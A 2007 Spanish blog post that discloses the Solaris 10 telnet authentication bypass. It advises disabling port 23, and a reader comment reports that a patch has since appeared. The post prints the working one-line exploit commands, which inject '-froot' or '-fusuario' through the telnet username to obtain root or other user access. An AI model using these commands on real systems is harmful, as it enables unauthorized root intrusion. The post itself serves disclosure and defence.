Busindre » Blog Archive » Bug en servidor telnet (Solaris)

Bug en servidor telnet (Solaris)

February 13th, 2007 by Busindre

Bug de seguridad en Sun Solaris 10 (Otras versiones pueden ser vulnerables) que permite a un atacante externo con acceso al servidor de telnet obtener privilegios de root fácilmente.

$ telnet -l "-froot" IP

También cualquier otro usuario mediante:

$ telnet -l "-fusuario" IP

No existe parche oficial. Se recomienda deshabilitar el acceso por telnet (puerto 23).

Fuente: http://blogs.securiteam.com/index.php/archives/814

Posted in Bugs |

2 Responses

  1. dragonauta Says:

    Solaris informó que está disponible el parche para el 'problemita' de telnet.

    Más información en:
    http://sunsolve.sun.com/search/document.do?assetkey=urn:cds:docid:1-21-120068-02-1

    Saludos

  2. Busi Says:

    Ya era hora :mrgreen:

Leave a Comment

Please note: Comment moderation is enabled and may delay your comment. There is no need to resubmit your comment.